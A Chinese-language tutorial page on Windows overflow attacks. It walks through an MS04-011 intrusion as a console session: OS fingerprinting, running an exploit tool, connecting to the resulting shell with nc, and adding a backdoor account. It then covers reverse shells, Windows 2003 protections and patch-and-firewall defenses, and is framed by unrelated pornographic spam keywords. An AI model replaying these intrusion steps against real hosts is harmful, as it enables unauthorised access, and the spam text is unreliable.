六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

系統漏洞溢出攻擊案例(圖)

[摘要]我們來看一下以前比較精典的一個溢出實例ms04011溢出: Microsoft Windows XP [版本 5.1.2600] (C) 版權所有 1985-2001 Microsoft Corp...

我們來看一下以前比較精典的一個溢出實例ms04011溢出:
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
C:windowssystem32cd
C:>
C:>getos 2**.159.31.96 (判斷操作系統
----------------------------
THCsmbgetOS v0.1 - gets gro
by Johnny Cyberpunk (
----------------------------
[*] Connecting Port 139....
[*] Sending session request.
[*] Sending negotiation requ
[*] Sending setup account re
[*] Successful....
Remote OS:
----------
WORKGROUP
Windows 2000 LAN Manager
Windows 5.1
C:>
C:>ms04011 1 2**.159.31.96 (溢出格式)
shellcode size 404
Ret value = 1727
C:>
C:>nc 2**.159.31.96 1234 (nc進行連接)
Microsoft Windows XP [版本 5.1.2600]
(C) 版權所有 1985-2001 Microsoft Corp.
D:WINDOWSsystem32> (得到目標機shell)
D:WINDOWSsystem32>net user test test /add
net user test test /add
命令成功完成。 (建立用戶)
上面只是簡單演示了一下溢出過程,上例是正向溢出,只是直接溢出后用nc進行連接,還可以反向溢出,反向溢出一般用來突破防火墻,先用nc在本機 監聽一個端口,等待反向溢出的服務器連接過來從而得到一個system權限的shell。對于溢出還有很多,如iis、mso4045、ms04049、 ms05039、ms05051、ms06061等還有一些精典的應用程序遠程溢出,如未打sp3的mssql遠程溢出可以直接得到系統權限。還有 imail服務也一樣可以通過遠程溢出獲得系統權限。還有很多病毒如沖擊波、震蕩波等病毒都是利用的rpc和lsass溢出漏洞,在感染一臺機器后又不斷 的以此機器為節點掃描網絡中的其它存在漏洞的機器進行溢出植入病毒程序,這樣不斷的繁殖下去。
不過在windiws2003下溢出就無用武之地了,因為在2003的保護機制里面還有一個技術是可控的SEH處理函數指針,2003中結構化異 常處理例程注冊后,它的函數指針會保存在模塊中的一個叫Load Configuration Directory的地址列表中,如果函數返回時系統發現堆棧中的Cookie發生了改變,視為溢出,系統就會查看當前線程相關的SEH中是否有相應的處 理函數指針,有的話,系統將該指針與已經注冊過函數的地址列表進行對照,如果沒有發現匹配的,而且處理函數指針在堆棧中,異常處理函數就不運行。如果該處 理函數指針位于已加載的各個DLL模塊地址范圍只外,或堆中,處理函數會被執行,這種可控制的異常處理技術就會使傳統的覆蓋SEH指針的方法失敗。雖然可 以用已經加載模塊以外的地址來覆蓋SHE但在遠程溢出中仍顯得無力。
我們再來看看本地溢出,本地溢出主要用來進行權限提升,前面的serv-u的本地溢出已經注入中講解了,我們現在再來看一下本地的一個特權提升漏洞,如圖:
系統漏洞溢出攻擊實例(圖)1cs.xzking.com/d/file/20150130/ffb697ecb1b37b0f24e8add91d1ea0b6.jpg' />
通過執行本地溢出直接從user用戶提升到系統權限。
對溢出攻擊的安全防范:
關閉139端口,停掉icp/ip netbios服務。
在本地連接的屬性窗口中tcp/ip協議中的高級選項里“禁用tcp/ip上的netbios(s)”因為很多溢出都是利用的這個通道。
安裝防火墻是必要的。
打上重要漏洞的補丁(如沖擊波補丁、震蕩波補丁),并開啟系統的自動更新功能。
服務器使用windows2003系統。


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 无人精品乱码一区二区三区 | 亚洲 欧美 自拍 卡通 综合 | 亚洲国产成a人v在线 | 亚洲自偷自偷图片在线高清 | 亚洲国产精品欧美综合 | 最新国产网站 | 探花视频在线看视频 | 手机三级在线 | 新男人天堂 | 自拍偷拍亚洲第一页 | 亚洲国产欧洲精品路线久久 | 婷婷综合久久中文字幕一本 | 天堂网在线资源www最新版 | 天天黄视频 | 青青草狠狠干 | 亚洲狼人区 | 日韩亚洲欧美在线观看 | 最新在线观看精品国产福利片 | 深爱婷婷网 | 天天伊人 | 中文字幕免费在线视频 | 欧美特黄视频在线观看 | 亚洲第二色 | 中文线码中文高清播放中 | 伊人狼人综合网 | 中文字幕在线不卡视频 | 性色午夜视频免费男人的天堂 | 三级黄色网络 | 欧美性野久久久久久久久 | 屁屁影院免费观看入口 | 一二三四免费高清观看在线观看 | 片成年免费观看网站黄 | 欧美午夜色大片在线观看免费 | 亚洲精品另类 | 欧美香蕉人人人人人人爱 | 午夜黄大色黄大片美女图片 | 五月激激激综合网色播胖胖 | 色橹橹欧美在线观看高清视频 | 三级理论手机在线观看视频 | 青青草精品在线 | 色综合久久天天综合绕观看 |